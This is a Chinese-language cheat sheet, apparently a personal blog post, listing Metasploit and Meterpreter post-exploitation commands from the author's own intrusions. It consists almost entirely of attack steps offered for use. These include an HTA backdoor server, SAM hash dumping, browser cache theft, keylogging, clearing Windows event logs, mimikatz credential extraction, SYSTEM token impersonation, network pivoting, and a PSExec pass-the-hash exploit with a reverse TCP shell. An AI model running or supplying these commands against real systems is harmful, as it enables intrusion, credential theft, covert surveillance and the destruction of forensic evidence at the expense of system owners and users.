日常发生的多数事情原本不带色彩。我们如何表达,便有了各自的世界
先放点我实战的经验?
use exploit/windows/misc/hta_server # 一句话hat后门
# 防止假session
有时会遇到假session或者刚连接就断开的情况
set ExitOnSession false
chcp 65001 # 解决shell乱码
run post/windows/gather/enum_chrome #获取Chrome缓存
基本系统命令
sessions -i <ID值> #进入会话 -k 杀死会话
background #将当前会话放置后台 run #执行已有的模块,输入run后按两下tab,列出已有的脚本 info #查看已有模块信息 getuid # 查看权限 getpid # 获取当前进程的pid sysinfo # 查看目标机系统信息 ps # 查看当前活跃进程 kill <PID值> 杀死进程 idletime #查看目标机闲置时间 reboot / shutdown #重启/关机 shell #进入目标机cmd shell
enumdesktops #查看可用的桌面
getdesktop #获取当前meterpreter 关联的桌面
set_desktop #设置meterpreter关联的桌面 -h查看帮助
screenshot #截屏
run vnc #使用vnc远程桌面连接
clearev #清除windows中的应用程序日志、系统日志、安全日志
常用模块
run post/windows/gather/smart_hashdump #从SAM导出密码哈希(需要SYSTEM权限)
run post/windows/gather/enum_patches #查看补丁信息
run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks #获取最近的文件操作
run post/windows/gather/enum_ie #获取IE缓存
run post/windows/gather/enum_chrome #获取Chrome缓存
run post/windows/gather/enum_patches #补丁信息
run post/windows/gather/enum_domain #查找域控
基本文件系统命令
getwd 或者pwd # 查看当前工作目录 search -f *pass* # 搜索文件 -h查看帮助 cat c:\\bzhack\\lpasswd.txt # 查看文件内容 upload /tmp/hack.txt C:\\bzhack # 上传文件到目标机上 download c:\\bzhack\\passwd.txt /tmp/ # 下载文件到本机上 edit c:\\1.txt #编辑或创建文件 没有的话,会新建文件 rm C:\\bzhack\\hack.txt mkdir bzhack2 #只能在当前目录下创建文件夹 rmdir bzhack2 #只能删除当前目录下文件夹 getlwd 或者 lpwd #操作攻击者主机 查看当前目录 lcd /tmp #操作攻击者主机 切换目录
摄像头
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标 uictl disable mouse #禁用鼠标 uictl disable keyboard #禁用键盘
execute执行文件
execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
migrate进程迁移
getpid # 获取当前进程的pid ps # 查看当前活跃进程 migrate <pid值> #将Meterpreter会话移植到指定pid值进程中 kill <pid值> #杀死进程
基本网络命令
ipconfig/ifconfig netstat –ano arp getproxy #查看代理信息 route #查看路由
portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口 portfwd delete -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口删除
autoroute添加路由
run autoroute –h #查看帮助 run autoroute -s 192.168.159.0/24 #添加到目标环境网络 run autoroute –p #查看添加的路由
Socks4a代理
msf> use auxiliary/server/socks4a msf > set srvhost 127.0.0.1 msf > set srvport 1080 msf > run
uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标 uictl disable mouse #禁用鼠标 uictl disable keyboard #禁用键盘
keyscan_start #开始键盘记录 keyscan_dump #导出记录数据 keyscan_stop #结束键盘记录
mimikatz
load mimikatz #help mimikatz 查看帮助
load kiwi
wdigest #获取Wdigest密码
mimikatz_command -f samdump::hashes #执行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords
kerberos #管理员在线或者没有注销下获取明文
incognito假冒令牌
use incognito #help incognito 查看帮助
list_tokens -u #查看可用的token
impersonate_token 'NT AUTHORITY\SYSTEM' #假冒SYSTEM token
或者impersonate_token NT\ AUTHORITY\\SYSTEM #不加单引号 需使用\\
execute -f cmd.exe -i –t # -t 使用假冒的token 执行
或者直接shell
rev2self #返回原始token
PSExec哈希传递
msf > use exploit/windows/smb/psexec msf > set payload windows/meterpreter/reverse_tcp msf > set LHOST 192.168.159.134 msf > set LPORT 443 msf > set RHOST 192.168.159.144 msf >set SMBUser Administrator msf >set SMBPass aad3b4*****04ee:5b5f00*****c424c msf >set SMBDomain WORKGROUP #域用户需要设置SMBDomain msf >exploit